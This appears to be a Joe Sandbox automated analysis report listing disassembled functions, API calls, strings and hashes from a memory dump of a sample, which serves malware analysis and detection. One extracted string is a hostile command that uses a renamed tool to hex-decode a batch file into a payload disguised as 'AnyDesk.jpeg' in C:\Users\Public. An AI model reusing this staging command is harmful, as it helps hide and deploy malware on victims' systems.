Instruction Fuzzy Hash: A0C1F432A1475186E750AF21E85067DB7E0FB44B95FA41139EE8E13B95DFBCE890C720

Function 00007FF7823FA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823FA3EA
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823FA40C
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA47B
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA4D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA508
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA54A

Strings

NTDLL.DLL, xrefs: 00007FF7823FA3E1
NtQueryInformationProcess, xrefs: 00007FF7823FA402

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction ID: 224d1ac0d4012eea79a6ecfb479d1b986fac0732fd3a3667147746ecfa9d14f7
Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction Fuzzy Hash: 3051C472B18B8286EB50AB16F810279B7E4FB88B86FA45135DE8E03B54DF7CD441C720

Function 00007FF7823D7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF7823D74A1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D74E8
_open_osfhandle.MSVCRT ref: 00007FF7823D7509
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823F4931

Strings

con, xrefs: 00007FF7823D748A

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction ID: a68fd098ef20baad27440bf176e1c5d07678abea5647b6b944b6dafcb1733a5c
Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction Fuzzy Hash: AD41C432A0864586E350AF15A45437DFEA1F789BA6FA48338DA2D437D0CFBDD849C760

Function 00007FF7823E0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON

Download Yara Rule

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0148
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
String ID:
API String ID: 734197835-0
Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction ID: 54a6fea25f0554cbc1e8db076c6d93870db0689d90459f37e9cefedb014b2075
Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction Fuzzy Hash: 7D61B539A0C69296E720AB11E810339FAE1FB45B46FE48179DD4D17F90DFBCA849C720

Function 00007FF7823D1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D2058

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

memset.MSVCRT ref: 00007FF7823D20C1
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D20D2
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823D2117
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D21DC

Strings

DIRCMD, xrefs: 00007FF7823D20C9, 00007FF7823D2109

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction ID: 7e02b81fbccff886aae52d0871d9d094b24f4f676bc82bffae2e9075cf9bc5cf
Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
Instruction Fuzzy Hash: 1B819F72A08BC28AEB20DF20E8942EDB7A4FB48349F604179DA8D67F59DF78D145C710

Function 00007FF7823FD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FD899
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD8A8
_get_osfhandle.MSVCRT ref: 00007FF7823FD8D7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD8F1
_get_osfhandle.MSVCRT ref: 00007FF7823FD8FF
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD921
_get_osfhandle.MSVCRT ref: 00007FF7823FD969
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FD983

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead
String ID:
API String ID: 3192234081-0
Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction ID: 3f69d666e889f2eea9266a7a16e635a59012bb12573fbd58c628e578d99e88f1
Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
Instruction Fuzzy Hash: 3231A032A086418BE750AF22B41867DFFA0FB89B82F909538DE4A43B95CE7CD445CB10

Function 00007FF7823FEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FEC73

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FEE0A

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FECD5
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FECED
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FED9C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FEDAC
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823FEDC8

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction ID: 11a0c52085214138767965d33ade0165a1f6357f4a5a1d48b5db00d3ef3865c2
Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
Instruction Fuzzy Hash: C5519E36705BC18AEB25EF21E8542E8B7A0FB88B45F948079CA4D47B54EF7CD545C720

Function 00007FF7823DDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7823DCEAA), ref: 00007FF7823DDFB8
RtlFreeHeap.NTDLL ref: 00007FF7823DDFCC
_setjmp.MSVCRT ref: 00007FF7823DE03E

Strings

C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 , xrefs: 00007FF7823DE00B

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$FreeProcess_setjmp
String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
API String ID: 777023205-1105753690
Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction ID: 2a4768cdfede8242a8afe36b571afeccb25f500a55c4a3be4951ff18a7757101
Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
Instruction Fuzzy Hash: 48515A71E1DA4285FA50AB12A8541B8FBA0FF48792FF44479D94D43BA5DFBCA840C731

Function 00007FF7823E1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E200F
wcsspn.MSVCRT ref: 00007FF7823E2226

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcsspn
String ID:
API String ID: 3809306610-0
Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction ID: 51549d999f0816f26f5b8644d7aacf9e9fa5ff55f8bde161b7bfcbec848e1eef
Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
Instruction Fuzzy Hash: B1B1C576A08B4691EA50EF15E4602B9F7A0FB44B81FE4807ACA4D57F94DFBCE845C720

Function 00007FF7823F8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

iswdigit.MSVCRT ref: 00007FF7823F8C85
iswdigit.MSVCRT ref: 00007FF7823F8CA2
wcstol.MSVCRT ref: 00007FF7823F8CBF
wcschr.MSVCRT ref: 00007FF7823F8CF0
wcschr.MSVCRT ref: 00007FF7823F8D16
wcschr.MSVCRT ref: 00007FF7823F8D6A

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$iswdigit$wcstol
String ID:
API String ID: 3841054028-0
Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction ID: 0fba01d4cb4b86c207badb31a2165b7589d8cf0c13993b583ccf1a37fe3315b5
Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
Instruction Fuzzy Hash: D2512C27A0475281EF68AB15E4205B9F6A1FF68752BE48136EE5D43AD4DF7CE881C320

Function 00007FF7823D4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D4C78

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

wcsrchr.MSVCRT ref: 00007FF7823D4CB9
wcsrchr.MSVCRT ref: 00007FF7823D4CE6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D4DD7
wcschr.MSVCRT ref: 00007FF7823F28DB

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcsrchr$wcschr
String ID:
API String ID: 110935159-0
Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction ID: 63cabbaa24b5dcfe913404cb6f63aa5b451414a2c12400408291b83b5db81955
Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction Fuzzy Hash: 40514A22B0978281FE60AB11A8243F9D390BF48BA6FA44175CE5D07FC4DE7CE545C310

Function 00007FF7823FE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823FE43A
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE45A
_get_osfhandle.MSVCRT ref: 00007FF7823FE4D9
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FE4F1

Part of subcall function 00007FF7823FD9D0: longjmp.MSVCRT(?,?,00000000,00007FF7823F048E), ref: 00007FF7823FDA58
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDAD6
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDAFC
Part of subcall function 00007FF7823FD9D0: memset.MSVCRT ref: 00007FF7823FDB22

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$File_get_osfhandle$PointerReadlongjmp
String ID:
API String ID: 1532185241-0
Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction ID: 15f93165345f2057b5e0316b1d5cdcbfadc1deb326caa66e62d42598615cc22a
Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction Fuzzy Hash: E5410932A0475187EB50AB21E45567DFAA1FB88B42FE4457DEA0E43B84CF7CE841C720

Function 00007FF7823D4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823D5012
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5030
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F2A84
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F2AD8
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F2B0F

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction ID: b1ee25a9338f18783f50b039859f80a50fb4820fc0a03fc3825f6cb592a6ecac
Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction Fuzzy Hash: 5B416072A08242CBEB646B51A46437DF651FB84B82FB4407DDA4E47B91CEBCE880C760

Function 00007FF7823FA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA77A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA7AF
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA80E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA839
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7823F9A82), ref: 00007FF7823FA850

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryValue$CloseErrorLastOpen
String ID:
API String ID: 2240656346-0
Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction ID: 6007433119481bc74f1af8be278ea00ea0372bcb4db6f39126c5aadd15c12b26
Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction Fuzzy Hash: 69319232A18B4186EB50AF15F460479FBA4FF88791FA44078EA4E43B64DF7CD845CB20

Function 00007FF7823F5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F5874
CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F595E

Strings

wil, xrefs: 00007FF7823F58A8, 00007FF7823F5993
_p0, xrefs: 00007FF7823F5811

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
